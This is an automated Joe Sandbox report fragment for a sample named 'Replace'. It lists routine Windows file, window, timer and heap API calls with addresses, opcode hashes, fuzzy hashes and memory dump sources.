                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: DirectoryRemove$ApisFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3215702115-0
                                                                                                                                                                                                              • Opcode ID: 91df346512e07775874034638f6e0d12c5f46c049a8d016bc16b9962a779da0a
                                                                                                                                                                                                              • Instruction ID: ee1d3078a7a58064403bd86a67f3663806fb4b4b686e4acfcd6b602198934673
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 91df346512e07775874034638f6e0d12c5f46c049a8d016bc16b9962a779da0a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1E09235900154ABCF212B74A825ADE77D49B11744F0045D5EC11A7195EFB0C805A7D1
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 00BB3126
                                                                                                                                                                                                                • Part of subcall function 00BB1BB2: AreFileApisANSI.KERNEL32(?,00000010,00BB2F3E,?,?,00000001), ref: 00BB1BD0
                                                                                                                                                                                                              • GetFileAttributesA.KERNEL32(00000000), ref: 00BB310F
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Attributes$Apis
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2164219574-0
                                                                                                                                                                                                              • Opcode ID: fc12a5e3975c902f9b3be5d0b301a804e666ef4abb8c84c784c88a8bcec36f6a
                                                                                                                                                                                                              • Instruction ID: 5030a4f788c083bf9e6adfcb72734953c2133e326e4a6c334dc101d73946aafa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc12a5e3975c902f9b3be5d0b301a804e666ef4abb8c84c784c88a8bcec36f6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96E01A32B00554ABCF292778AC6699DB7E49B45765F0086AAF922E32E0EF60C9458681
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • KillTimer.USER32(00008001,00000003), ref: 00BB7ED7
                                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(00008001,00000000), ref: 00BB7F07
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CallbackDispatcherKillTimerUser
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 45433635-0
                                                                                                                                                                                                              • Opcode ID: cc73563847068091c4a75776a4e7d87cc6ba445419c27b1d3b58a9d60e1dbc2b
                                                                                                                                                                                                              • Instruction ID: eec3f413198755fd2a0896147b62d93da64245a4d46aea56f390c2abb9c40390
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cc73563847068091c4a75776a4e7d87cc6ba445419c27b1d3b58a9d60e1dbc2b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A1F0F831148741EBDB729B10C849BABBFE5BF80705F148C9EF096159A0CBB1A894DB55
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,?,-00000086,000001E4), ref: 00BB2AD3
                                                                                                                                                                                                                • Part of subcall function 00BB1BB2: AreFileApisANSI.KERNEL32(?,00000010,00BB2F3E,?,?,00000001), ref: 00BB1BD0
                                                                                                                                                                                                              • SetCurrentDirectoryA.KERNEL32(00000000,74DF2EE0,?,-00000086,000001E4), ref: 00BB2ABC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory$ApisFile
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4088297939-0
                                                                                                                                                                                                              • Opcode ID: 87d0132fecec9dc36049409627312a82b99909eca39b7c8c738370f613457ebe
                                                                                                                                                                                                              • Instruction ID: 14789e248d674508a80e801edcaedaf997e2ed745d07e4eab5a09b46329242ad
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 87d0132fecec9dc36049409627312a82b99909eca39b7c8c738370f613457ebe
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E1E02631D01118ABCF212B70A826FDEB7E4EF00350F008AE9EC01A71A0FF70884487C0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00BBCA76
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00BBCAFA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3168844106-0
                                                                                                                                                                                                              • Opcode ID: c429dc0628a2d1b9756e11e216336507c4a1d925e2d95bdad72725b494a52376
                                                                                                                                                                                                              • Instruction ID: fb77a6504b9a6ccc0529f13efaa232a0a18a6edd508b3fdcd052302ca00ba69e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c429dc0628a2d1b9756e11e216336507c4a1d925e2d95bdad72725b494a52376
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0821ACB5200706EF8308CF5AE984C56FBF9FF887147018A9AE95897721D771F950CAA2
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3886170330-0
                                                                                                                                                                                                              • Opcode ID: b02db1719b207eb0ef4ebbdd98b5543887c51553c1033f43e4611cb8984def6c
                                                                                                                                                                                                              • Instruction ID: 88afa165b8c268f18eeda237064d929c68bd9eb9dcd07821e2fa0782cf8662e1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b02db1719b207eb0ef4ebbdd98b5543887c51553c1033f43e4611cb8984def6c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67F15B71A006469FDB25DF68C495FEDBBE1FF18300F1484ADE459AB252DBB0E980CB94
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3886170330-0
                                                                                                                                                                                                              • Opcode ID: baf3d1460dd84fc867addffeb2ba72eb22ce7e5c58f28a44e428ade3a829b297
                                                                                                                                                                                                              • Instruction ID: 43e910421972de768e21e7b9836365b942a880bc0886ac2fe0f84ab36ae3cf58
                                                                                                                                                                                                              • Opcode Fuzzy Hash: baf3d1460dd84fc867addffeb2ba72eb22ce7e5c58f28a44e428ade3a829b297
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F21104343042015BDB14EF18D881BFAB7D9EF89304F1000E9F810AB353DAB5ED098761
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
Uniqueness

Uniqueness Score: -1.00%

APIs
• DestroyWindow.USER32(00000000), ref: 00BC5E76
Memory Dump Source
• Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
Similarity
• API ID: DestroyWindow
• String ID:
• API String ID: 3375834691-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(?,00000402,00000000,00000000), ref: 00BB7D52
Memory Dump Source
• Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00BB227E: CreateFileA.KERNEL32(00000000,?,?,00000000,00000000,?,00000000), ref: 00BB22B6
• SetFileTime.KERNEL32(00000018,00000000,000000FF,00000000,?,80000100,00000001,00000003,00000080,00000000,00000000,00000000,00000000,?,00BB5DD6,?), ref: 00BB4712
Memory Dump Source
• Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
Similarity
• API ID: File$CreateTime
• String ID:
• API String ID: 1043708186-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,-00000086,-00000126,?,00BCC0D5,-00000086,00000022,00BB16C5,00000008,74DF2EE0,00BCB6C9), ref: 00BD27AF
Memory Dump Source
• Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00BB45A0: WaitForSingleObject.KERNEL32(?,000000FF,00BC5E12,?,?,?,?,-00000086,000001E4), ref: 00BB45A3
  • Part of subcall function 00BB45A0: GetLastError.KERNEL32(?,?,?,?,-00000086,000001E4), ref: 00BB45AE
• PostMessageA.USER32(00000001,00008001,00000000,00000000), ref: 00BC5D31
Memory Dump Source
• Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
• Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
Similarity
• API ID: ErrorLastMessageObjectPostSingleWait
• String ID:
• API String ID: 1021788411-0
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3886170330-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WriteFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00BB2454
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ReadFile.KERNELBASE(?,?,?,00000000,00000000), ref: 00BB241D
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catch
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3886170330-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(-0000002A,-0000002A,00BB228C), ref: 00BB22F9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3_catch.LIBCMT ref: 00BC6112
                                                                                                                                                                                                                • Part of subcall function 00BC5CF2: PostMessageA.USER32(00000001,00008001,00000000,00000000), ref: 00BC5D31
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_catchMessagePost
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 678948607-0
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,?,00BC5CD2,?,00BC5CA6,?,00000012,00BE4B54,00000008,00BC6411,00000004,00BC622B,?,?,000000A4,00BCB95B), ref: 00BB4589
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2591292051-0
                                                                                                                                                                                                              • Opcode ID: 13fd0427e47eaf05561a8d4bd3743777452fe5ce60f8ea813195365893b5f943
                                                                                                                                                                                                              • Instruction ID: 45391a63e1f3e2bdaf4b2cea1077c3811e3243132a3dcccb7dc2b0ce263a66df
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 13fd0427e47eaf05561a8d4bd3743777452fe5ce60f8ea813195365893b5f943
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F6D0C931125621CBE7715E24A8147E6B7E4BB24311F1144AE908481051FBF08880CA40
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • _free.LIBCMT ref: 00BD055B
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: RtlFreeHeap.NTDLL(00000000,00000000,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?), ref: 00BD1C11
                                                                                                                                                                                                                • Part of subcall function 00BD1BFB: GetLastError.KERNEL32(?,?,00BD42C9,?,00000000,?,00000001,?,00BD42F0,?,00000007,?,?,00BD4716,?,?), ref: 00BD1C23
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797770301.0000000000BDB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797785608.0000000000BE6000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797800296.0000000000BEA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_bb0000_Replace.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast_free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1353095263-0
                                                                                                                                                                                                              • Opcode ID: ade91ee8a1e1f879fcfac3a0c78c7d8d97f93fa3371e5ca2b20ace8538ad6864
                                                                                                                                                                                                              • Instruction ID: 5c10d4e8ffc85ecefca269e01448c9cd1485f94bd321d77ddf82ea532ad4b5aa
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ade91ee8a1e1f879fcfac3a0c78c7d8d97f93fa3371e5ca2b20ace8538ad6864
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7C08C31000208BBCB009B49C906E4EBBB8DB80364F200085F40017240EAB2EE009A80
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1797746212.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1797731979.0000000000BB0000.00000002.00000001.01000000.00000003.sdmp
